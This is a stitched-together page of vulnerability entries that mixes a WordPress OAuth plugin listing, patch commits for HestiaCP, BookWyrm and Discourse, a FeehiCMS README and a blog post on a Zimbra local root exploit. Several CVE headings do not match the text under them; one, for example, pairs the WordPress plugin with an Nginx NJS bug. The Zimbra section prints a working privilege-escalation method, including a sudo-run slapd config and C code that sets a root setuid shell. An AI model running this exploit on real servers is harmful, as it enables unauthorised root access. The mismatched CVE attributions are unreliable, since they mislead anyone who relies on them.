Authentication Bypass vulnerability in miniOrange WP OAuth Server plugin <= 3.0.4 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

WP OAuth Server plugin turns your WordPress site into an OAuth Server. It allows you to login into Rocket Chat, Invision Community, WordPress, Odoo, EasyGenerator, Salesforce, Zapier, Moodle, Edunext, Wickr, Freshdesk, FreshWorks, ServiceNow, Knack database, Circlo.so, Tribe.so, Tribe, Mobilize, Nextcloud, Church Online, iSpring LMS, Nextcloud, Academy of Mine, BoardEffect, TalentLMS, PowerSchool and any other OAuth 2.0 compliant applications using WordPress credentials.

Basically, the OAuth Server plugin allows users to login into applications that are OAuth 2.0 compliant, using their WordPress login credentials. As it’s name suggests, it follows the OAuth 2.0 protocol. Along with that, it also supports OpenID Connect (OIDC), and JWT protocols.

The primary goal of the OAuth Server plugin is to enable Single Sign On so that users do not need to remember username and password for each application.  
Once Single Sign On is enabled, users do not need to store sensitive information to login into different applications.

**LIST OF POPULAR OAUTH CLIENTS SUPPORTED**

*   Rocket.Chat
*   Invision Community (IPB Forum)
*   Odoo
*   WordPress
*   EasyGenerator
*   Salesforce
*   Zapier
*   Moodle
*   Edunext
*   Wickr
*   Freshdesk
*   FreshWorks
*   ServiceNow
*   Knack database
*   Circle.so
*   Tribe.so
*   Mobilize
*   Nextcloud
*   iSpring LMS
*   Church Online
*   Academy of Mine
*   BoardEffect

**WORDPRESS OAUTH / OPENID CONNECT SERVER USE CASES**

*   If you want to use your WordPress site as an Identity Server / OAuth Server / OAuth Provider and use WordPress user’s login credentials to login into your client site / application then you can use this plugin. You can also decide what kind of User data / attributes you want to send while Single Sign On into your client site / application.
*   If you want to login to your Mobile app / Single Page web app (SPA) using your WordPress credentials, then you can use the Authorization code with PKCE flow grant type to achieve your use case.
*   Single set of credentials will be used to login to multiple WordPress websites.
*   You can access the NIGINX resources using NIGINX Authentication. Once you login into your client application using WP OAuth Server credentials, you will get JWT. Your client application can further use it for NGINX Authentication.

**WORDPRESS OAUTH / OPENID CONNECT SERVER FREE VERSION FEATURES**

*   Supports Login with WordPress for Single Client application
*   Protocol Support – OAuth 2.0, OpenID Connect (OIDC)
*   Master Switch – Block / unblock OAuth API calls between OAuth Clients and Server
*   Token Length – Change the access token length
*   Server Response – Sends User ID, username, email, first name, last name, display name in the response
*   Grant types Supported – Authorization Code grant
*   OAuth API Documentation
*   Setup guides to configure the plugin with various OAuth Clients (more coming soon)

**WORDPRESS OAUTH / OPENID CONNECT SERVER PREMIUM VERSION FEATURES**

*   All FREE version features
*   Supports Login with WordPress for Multiple Client applications
*   Server Response – Sends all the profile attributes along with roles, allows to send custom attributes from usermeta table and also customize the attribute names that need to be sent in server response
*   Grant Types Supported : Authorization Code Grant, Implicit Grant, Password Grant, Client Credentials Grant, Refresh Token Grant, Authorization Code grant with PKCE flow
*   Token Lifetime – Configure the access token and refresh token expiry time
*   Enforce State Parameter – Based on client configuration, you can enable or disable state parameter
*   Authorize / Consent prompt – Enable / disable the consent screen
*   Redirect/Callback URI Validation – Enable / disable this feature, based on dynamic redirect to a different pages for certain conditions
*   Multi-Site Support – Use the plugin in WordPress Multisite network environment
*   JWT Signing Algorithm – Supports signing algorithms HSA and RSA
*   Additional endpoints – Provides OpenID Connect Discovery endpoint, Introspection endpoint, OpenID Connect Single logout endpoint  
    A grant is a method of acquiring an access token. Deciding which grants to implement depends on the type of client the end user will be using, and the experience you want for your users.

**WE SUPPORT FOLLOWING GRANTS:**

*   **Authorization code grant** : This code grant is used when there is a need to access the protected resources on behalf of the user on another third party application.
*   **Implicit grant** : This grant relies on resource owner and registration of redirect uri. In authorization code grant users need to ask for authorization and access token each time, but here access token is granted for a particular redirect uri provided by a client using a particular browser.
*   **Client credential grant** : This grant type heads towards specific clients, where access token is obtained by client by only providing client credentials. This grant type is quite confidential.
*   **Resource owner password credentials grant** : This type of grant is used where the resource owner has a trust relationship with the client. Just by using username and password, provided by resource owner authorization and authentication can be achieved.
*   **Refresh token grant** : Access tokens obtained in OAuth flow eventually expire. In this grant type client can refresh his or her access token.
*   **Authorization code grant with PKCE flow** : This grant type is used for public clients like mobile and native apps, Single Page web apps, where there is a risk of client secret being compromised.

**REST API AUTHENTICATION**

Rest API is very much open to interact. Creating posts, getting information of users and much more is readily available.  
It secures unauthorized access to your WordPress sites/pages using our WordPress REST API Authentication plugin .

**From your WordPress dashboard**

1.  Visit Plugins > Add New
2.  Search for OAuth 2.0 server. Find and Install OAuth 2.0 server
3.  Activate the plugin from your Plugins page

**From WordPress.org**

1.  Download OAuth 2.0 server.
2.  Unzip and upload the miniorange-oauth-login directory to your /wp-content/plugins/ directory.
3.  Activate miniOrange OAuth from your Plugins page.

**I need to customize the plugin or I need support and help?**

Please email us at info@xecurify.com or Contact us. You can also submit your query from plugin’s configuration page.

Initial setup was giving my team some issues and we were able to get walked through a drupal to wordpress sso setup with the team at miniorange.

The plugin works without problems, and our Wordpress site's login is now working smooth. Very helpful and capable Support, who has answered in a fast manner. They get directly to the point and answer the questions with rich answers that makes even a (in the context of SSO) less experienced user understand what is happening.

The free version of this plugin worked great for my use case. I had some issues initially that ended up being on the side of my hosting provider, but the support I received by the developers of this plugin was well beyond what I would have expected.

I tried this plugin to link Wordpress with Invision Community (IPS). According to the docs at Invision, there are 2 ways to do this. I chose the first one linking IPS to WP as the server as opposed to IPS acting as the server. My review is based on this experience but I'll try the other way too. It quick and easy to set up, and clearly there's a large amount of work gone into it, but once I'd got the connection configured, that's when I found that the logins expire after just 600 seconds, that's just 10 minutes! According to the support section, it says this is fixed at 3600 seconds, unless you upgrade to the pro. But 10 mins isn't an hour, which would be okay at minimum for a WP site member to browse and compose a comment or review on Gallery images, post in a forum etc in Invision Community forming part of the same site. Secondly, probably 90%+ of this plugin is locked down and almost everything seems to say you need to upgrade to pro. Instead of 7 tabs full of settings and options you can't use, why not create a simpler lite version with a non-intrusive ad for the pro version benefits? If you want a simple Single Sign On OAUTH solution to link your WP user accounts to your IPS accounts and sync basic profile info for the convenience of your visitors but then forget about it, it will do the job but as crippled as it is, this probably isn't what you are looking for, unless you want the pro support and anything beyond the bare minimum.

We were very impressed with the level of support given by the miniorange team. During our development we ran into a few problems due to other plugins and our custom application, which caused problems for logout. However, the miniorange team was great they were quick to respond to our questions and even attended a zoom session with us to help track down the problem. Definitely one of the best plugin authors for support. I've worked with many and these guys are second to none.

We ended up not buying the plugin but we have to admit the pre-sales support was stellar including pro-actively reaching us to help configure it.

Read all 27 reviews

“WP OAuth Server ( Login with WordPress )” is open source software. The following people have contributed to this plugin.

Contributors

**4.0.1**

*   Vulnerability fixes
*   Code improvements

**3.0.4**

*   Token Post Response header already sent warning fix

**3.0.3**

*   Database Query Optimization

**3.0.2**

*   CORS issue fix
*   Added trial option of the premium
*   Licensing page changes

**3.0.1**

*   Added compatibility with WP 5.9
*   Improved performance of website by setting autoload to false

**3.0.0**

*   Support for email attribute in the userinfo endpoint
*   Link to the OAuth API documention
*   Client specific UI improvements

**2.13.8**

*   Security Fixes

**2.13.7**

*   UI improvement – Copy button for endpoints and client credentials
*   Bug fix for supplied\_redirect\_uri
*   Consent screen on every login

**2.13.6**

*   permission\_callback warning fix

**2.13.5**

*   minor bug fixes
*   added copy button to copy the client credentials and endpoints
*   readme update

**2.13.4**

*   minor UI updates
*   added compatibility with WP 5.7

**2.13.3**

*   minor bug fixes
*   fixed compatibility with Brizzy
*   added compatibility with WP 5.6

**2.13.2**

*   minor bug fixes
*   fixed issue with deactivation form
*   added compatibility with WP 5.5

**2.13.1**

*   Added compatibility with WordPress v5.5

**2.13.0**

*   Added UI fixes
*   Updated demo plan fixes
*   Minor bugfixes and compatibility fixes

**2.12.4**

*   Licensing tab fix

**2.12.3**

*   Added fixes for some features
*   Added option to disable authorize screen

**2.12.2**

*   Added Compatibility with WordPress v5.4

**2.12.0**

*   Performance Improvements

**2.11.0**

*   Fixed bug where blank scope led to blank screen
*   Fixed “Deny” button resulting in clicking “Allow”
*   Fixed unaccounted bytes error notice on activation
*   Updated plugin licensing
*   Minor UI Improvements

**2.10.0**

*   Added fixes for Loopback Request failure
*   Updated Endpoints based on REST API and Authorize Consent Screen
*   Minor Bugfixes

**2.9.1**

*   Fixed migration issue

**2.9.0**

*   Fixed bug where bearer access\_token was not recognized.
*   Updated Endpoints

**2.8.2**

*   Updated Installation Steps

**2.8.1**

*   Compatibility changes for miniOrange OAuth Single Sign On

**2.8.0**

*   Updated registration form
*   Advertised Introspection Endpoint

**2.7.0**

*   Added compatibility for WordPress Version 5.2
*   Added fixes for OpenID Connect flow
*   Added fixes for OTP related issue
*   Updated Endpoints
*   Added alternative for Sign Up
*   Advertised Scope Based Response

**2.6.1**

*   Fixed conflicts for function generateRandomString()

**2.6.0**

*   Advertised new features as per new Licensing Plan

**2.5.6**

*   Added Compatibility for Rocket.chat

**2.5.5**

*   Fixed OTP related issue

**2.5.4**

*   Updated Licensing Plan

**2.5.3**

*   Added Visual Tour fixes

**2.5.2**

*   Added bugfixes

**2.5.1**

*   Added missing files

**2.5.0**

*   New Features
*   Major UI Revamp
*   Added Feature Tour

**2.4.0**

*   Compatibility with WordPress 5.1

**2.3.0**

*   Added Feedback Form and Updated UI

**2.2.1**

*   Added support for Invision Community and Rocket.chat

**2.2.0**

*   Updated UI

**2.1.0**

*   Fixed the PHP7.2 Compatibility issue

**2.0.3**

*   Changes in the title

**2.0.2**

*   Added features

**2.0.1**

*   Added support for multiple client

**1.0.1**

*   Initial Release

CVE-2022-34149: WP OAuth Server ( Login with WordPress )

An issue was discovered in Nginx NJS v0.7.5. The JUMP offset for a break instruction was not set to a correct offset during code generation, leading to a segmentation violation.

CVE-2022-35173

An issue was discovered in HestiaCP before v1.3.5. Attackers are able to arbitrarily install packages due to values taken from the pgk [] parameter in the update request being transmitted to the operating system's package manager.

Permalink

Browse files

Merge remote-tracking branch 'jaapmarcus/fix/prevent-install-non-cont…

…rolled-package' into main

*   Loading branch information

Kristan Kenney committed

Mar 30, 2021

2 parents 32ef8a2 + 9a1fccd commit 27556a9a43aeaf308b33be224c2e70f2011574e6

Showing **2 changed files** with **7 additions** and **0 deletions**.

*   *   v-update-sys-hestia
*   *   main.sh

@@ -32,6 +32,7 @@ source $HESTIA/conf/hestia.conf

  

# Checking arg number

check\_args '1' "$#" 'PACKAGE'

is\_hestia\_package "hestia,hestia-nginx,hestia-php" "$package"

  

# Perform verification if read-only mode is enabled

check\_hestia\_demo\_mode

@@ -1154,6 +1154,12 @@ multiphp\_default\_version() {

echo "$sys\_phpversion"

}

  

is\_hestia\_package(){

if \[ \-z "$(echo $1 | grep -w $2)" \]; then

check\_result $E\_INVALID "$2 package is not controlled by hestiacp"

fi

}

  

# Run arbitrary cli commands with dropped privileges

# Note: setpriv --init-groups is not available on debian9 (util-linux 2.29.2)

# Input:

**0 comments on commit 27556a9**

Please sign in to comment.

CVE-2021-30070: Merge remote-tracking branch 'jaapmarcus/fix/prevent-install-non-cont… · hestiacp/hestiacp@27556a9

Zimbra's sudo configuration permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.

This exploit was brought to you by “reading the manual”, mostly. It is the second local privilege escalation I found while doing an extremely low effort audit of Zimbra.

You should read the first post, here: https://darrenmartyn.ie/2021/10/25/zimbra-nginx-local-root-exploit/

In order to exploit this issue, you need code execution as the “zimbra” user.

TL;DR: In a stock Zimbra install, the “zimbra” user has access to run a number of shell commands with root permissions.

One of these is “zmslapd”, as per the following output from “sudo -l”:

    (root) NOPASSWD: /opt/zimbra/libexec/zmslapd

What does this command do? Well, lets find out. Using the extremely sophisticated reverse engineering software, cat, we can do so. I even left the licence block in, just, you know, to be nice.

$ cat /opt/zimbra/libexec/zmslapd
#!/bin/bash
# 
# \*\*\*\*\* BEGIN LICENSE BLOCK \*\*\*\*\*
# Zimbra Collaboration Suite Server
# Copyright (C) 2007, 2008, 2009, 2010, 2012, 2013, 2014, 2015, 2016 Synacor, Inc.
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software Foundation,
# version 2 of the License.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
# without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with this program.
# If not, see <https://www.gnu.org/licenses/>.
# \*\*\*\*\* END LICENSE BLOCK \*\*\*\*\*
# 

ulimit -n 32768
ulimit -c unlimited
ulimit -v unlimited
export LD\_PRELOAD=/opt/zimbra/common/lib/libtcmalloc\_minimal.so
exec /opt/zimbra/common/libexec/slapd "$@"

So basically all this script does is execute slapd with whatever arguments we give it, after setting up some ulimit stuff and LD_PRELOAD‘ing a specific malloc implementation.

We now shall refer to the slapd manual, in order to figure out a way to exploit this.

Using the -u root and -g root arguments, we can ensure that slapd does not drop permissions when ran, and runs as root. With the -f filename argument, we can force it to use a specific configuration file.

We copy the slapd config file zimbra ships with, and look for something usable. Turns out, there is a way to load in modules, which are just shared objects. So we tweak configuration to do just that.

\# Load dynamic backend modules:
modulepath      /tmp/slapper
moduleload      hax.so
# moduleload    back\_ldap.la

What is “hax.so”? Well, it is a shared object that just puts the setuid bit on a shell we drop. We use a constructor so it runs once its loaded, instead of writing a proper module for slapd. It is just easier this way and works fine.

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
\_\_attribute\_\_ ((\_\_constructor\_\_))
void dropshell(void){
    chown("/tmp/slapper/rootslap", 0, 0);
    chmod("/tmp/slapper/rootslap", 04755);
    printf("\[+\] done!\\n");
}

We package up this whole thing into a nice shell script, and we get the following.

The steps are fairly simple. Create a directory to work in, create our shared object, a rootshell binary, and our config file. Then run the zslapd command with sudo and arguments to run as root and use our config file. We get root.

You can find the exploit code here: https://github.com/darrenmartyn/zimbra-slapper

There are more privesc opportunities in Zimbra waiting to be exploited. I might even spend time on those next. Just depends how much time I want to spend reading manual pages. Maybe finding the next one is an exercise for the reader?

Disclosure timeline: None, I just didn’t bother. See the previous post for why.

**Post navigation**

CVE-2022-37393: Zimbra “zmslapd” Local Root Exploit.

In versions 2.x before 2.3.0 and all versions of 1.x, An attacker authorized to create or update ingress objects can obtain the secrets available to the NGINX Ingress Controller. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVE-2022-30535

In versions 2.x before 2.3.1 and all versions of 1.x, when NGINX Instance Manager is in use, undisclosed requests can cause an increase in disk resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVE-2022-35241

BookWyrm is a social network for tracking reading. Versions prior to 0.4.5 were found to lack rate limiting on authentication views which allows brute-force attacks. This issue has been patched in version 0.4.5. Admins with existing instances will need to update their `nginx.conf` file that was created when the instance was set up. Users are advised advised to upgrade. Users unable to upgrade may update their nginx.conf files with the changes manually.

Permalink

Browse files

Merge pull request #2230 from bookwyrm-social/nginx-rate-limit

Adds rate limiting to some views in nginx

*   Loading branch information

2 parents ed20587 + e1e6a2d commit 7bbe42fb30a79a26115524d18b697d895563c92f

Showing **3 changed files** with **19 additions** and **0 deletions**.

*   *   development
    *   production
    *   server\_config

@@ -7,6 +7,15 @@ upstream web {

server {

listen 80;

  

location ~ ^/(login|password-reset|resend-link) {

limit\_req zone=loginlimit;

  

proxy\_pass http://web;

proxy\_set\_header X-Forwarded-For $proxy\_add\_x\_forwarded\_for;

proxy\_set\_header Host $host;

proxy\_redirect off;

}

  

location / {

proxy\_pass http://web;

proxy\_set\_header X-Forwarded-For $proxy\_add\_x\_forwarded\_for;

@@ -41,6 +41,15 @@ server {

\# root /var/www/certbot;

\# }

#

\# location ~ ^/(login|password-reset|resend-link) {

\# limit\_req zone=loginlimit;

#

\# proxy\_pass http://web;

\# proxy\_set\_header X-Forwarded-For $proxy\_add\_x\_forwarded\_for;

\# proxy\_set\_header Host $host;

\# proxy\_redirect off;

\# }

#

\# location / {

\# proxy\_pass http://web;

\# proxy\_set\_header X-Forwarded-For $proxy\_add\_x\_forwarded\_for;

@@ -1 +1,2 @@

client\_max\_body\_size 10m;

limit\_req\_zone $binary\_remote\_addr zone=loginlimit:10m rate=1r/s;

**1 comment on commit 7bbe42f**

**Choose a reason for hiding this comment**

The reason will be displayed to describe this comment to others. Learn more.

@mouse-reeve maintainer pls confirm are you happy to assign a CVE for this, then only hunter.dev admin can move further

Please sign in to comment.

CVE-2022-35925: Merge pull request #2230 from bookwyrm-social/nginx-rate-limit · bookwyrm-social/bookwyrm@7bbe42f

Discourse is the an open source discussion platform. In affected versions a maliciously crafted request for static assets could cause error responses to be cached by Discourse's default NGINX proxy configuration. A corrected NGINX configuration is included in the latest stable, beta and tests-passed versions of Discourse. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Permalink

Browse files

SECURITY: Do not cache error responses for static assets (stable)

*   Loading branch information

 

1 parent f0ef186 commit 7af25544c3940c4d046c51f4cfac9c72a06d4f50

Showing **1 changed file** with **0 additions** and **1 deletion**.

@@ -247,7 +247,6 @@ server {

proxy\_cache one;

proxy\_cache\_key "$scheme,$host,$request\_uri";

proxy\_cache\_valid 200 301 302 7d;

proxy\_cache\_valid any 1m;

proxy\_cache\_bypass $bypass\_cache;

proxy\_pass http://discourse;

break;

**0 comments on commit 7af2554**

Please sign in to comment.

CVE-2022-31182: SECURITY: Do not cache error responses for static assets (stable) · discourse/discourse@7af2554

In zulip before 1.3.12, bot API keys were accessible to other users in the same realm.

CVE-2016-4426: Version History — Zulip 2.1.7 documentation

A stored cross-site scripting (XSS) vulnerability in /index.php?r=site%2Fsignup of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username field.

**FeehiCMS **(English)** 首款编写单元测试、功能测试、验收测试的yii2开源系统**

基于yii2的CMS系统，运行环境与yii2(php>=5.4)一致。FeehiCMS旨在为yii2爱好者提供一个基础功能稳定完善的系统，使开发者更专注于业务功能开发。 FeehiCMS没有对yii2做任何的修改、封装，但是把yii2的一些优秀特性几乎都用在了FeehiCMS上，虽提供文档， 但FeehiCMS提倡简洁、快速上手，基于FeehiCMS开发可以无需文档，反倒FeehiCMS为yii2文档提供了最好的实例

  

**演示站点**

演示站点后台 **用户名:feehicms 密码123456**

*   后台 http://demo.cms.feehi.com/admin
*   前台 http://demo.cms.feehi.com
*   api http://demo.cms.feehi.com/api/articles

**更新记录****帮助**

1.  开发文档http://doc.feehi.com
    
2.  QQ群 936448696
    
3.  微信  
    
4.  Email job@feehi.com
    
5.  bug反馈
    

**功能**

*   多语言
*   单元测试
*   功能测试
*   验收测试
*   RBAC权限管理
*   restful api
*   文章管理
*   操作日志
*   适配手机

FeehiCMS提供完备的web系统基础通用功能，包括前后台菜单管理,文章标签,广告,banner,缓存,网站设置,seo设置,邮件设置,分类管理,单页...

**使用Docker**

1.下载镜像

    $ docker pull registry.cn-hangzhou.aliyuncs.com/feehi/cms #FQ后建议直接使用docker pull feehi/cms

2.创建容器

    $ docker run --name feehicms -h feehicms -itd -v /path/to/data:/data -e DBDSN=sqlite:/data/feehi.db -e TablePrefix=feehi\_ -e AdminUsername=admin -e AdminPassword=123456 -p 8080:80 feehi/cms

以上命令将会自动初始化FeehiCMS，并导入数据库(默认数据库为sqlite)  
如果需要更使用其他数据库，比如mysql，执行:

    $ docker run --name feehicms -h feehicms -itd -e DBDSN=mysql:host=mysql-ip;dbname=feehi -e DBUser=dbuser -e DBPassword=dbpassword -e TablePrefix=feehi\_ -e AdminUsername=admin -e AdminPassword=123456 -p 8080:80 feehi/cms

如果需要使用postgresql则将DBDSN改为pgsql:host=pgsql-ip

也可以仅初始化FeehiCMS，然后通过web在线安装

    $ docker run --name feehicms -h feehicms -itd -p 8080:80 feehi/cms -o start

然后访问http://ip:port/install.php，根据提示选择数据库类型，填写数据库用户名、数据库密码、后台管理员用户名、密码完成安装。

以上方式启动的容器只能用作开发环境，容器启动命令最终调用为php -S 0.0.0.0:80,如果用作production，可以执行

    $ docker run --name feehicms -h feehicms -itd -p 8080:80 feehi/cms -m start

容器将启动php-fpm，并监听9000端口，配合nginx使用。nginx配置大致为

    location ~ \\.php$ {
        ...
        fastcgi\_pass fpm-ip:9000;
        fastcgi\_param  SCRIPT\_FILENAME  /usr/local/feehicms/frontend/web$fastcgi\_script\_name;
        ...
    }

**因为yii2会生成js/css，以及新上传的文件（图片）需要nginx webroot使用php fpm容器同一个文件夹:/usr/local/feehicms/frontend/web**

**安装**

前置条件: 如未特别说明，本文档已默认您把php命令加入了环境变量，如果您未把php加入环境变量，请把以下命令中的php替换成/path/to/php

> 无论是使用归档文件还是composer，都有相应阶段让您填入后台管理用户名、密码

1.  使用归档文件(简单，适合没有yii2经验者)
    
    1.  下载FeehiCMS源码 点击此处下载最新版
    2.  解压到目录
    3.  配置web服务器web服务器配置
    4.  浏览器打开 http://localhost/install.php 按照提示完成安装(若使用php内置web服务a器则地址为 http://localhost:8080/install.php )
    5.  完成
2.  使用composer (推荐使用此方式安装)
    
    > composer的安装以及国内镜像设置请点击 此处
    
    > 以下命令默认您已全局安装composer，如果您是局部安装的composer:请使用php /path/to/composer.phar来替换以下命令中的composer
    
    1.  使用composer创建FeehiCMS项目
        
            $ composer create-project feehi/cms webApp //此命令创建的FeehiCMS项目不能平滑升级新版本(目录结构简单,目前主力维护版本)
        
    2.  依次执行以下命令初始化yii2框架以及导入数据库
        
        $ cd webApp
        $ php ./init --env=Development #初始化yii2框架，线上环境请使用--env=Production
        $ php ./yii migrate/up --interactive=0 #导入FeehiCMS sql数据库，执行此步骤之前请先到common/config/main-local.php修改成正确的数据库配置
        
    3.  配置web服务器web服务器配置
        
    4.  完成
        

**运行测试**

1.  仅运行单元测试,功能测试(不需要配置web服务器)

   cd /path/to/webApp
   vendor/bin/codecept run

2.  运行单元测试,功能测试,验收测试(需要配置完web服务器)
    1.  分别拷贝backend,frontend,api三个目录下的tests/acceptance.suite.yml.example到各自目录，并均重名为acceptance.suite.yml,且均修改里面的url为各自的访问url地址
    2.  与上(仅运行单元测试,功能测试)命令一致

**项目展示**

*   山东城市服务技师学院
*   优悦娱乐网
*   吉安市食品药品监督管理局
*   完美娱乐
*   房产网
*   中丞法拍网
*   51前途网
*   用友财务软件
*   ......

**运行效果**

Tag

#nginx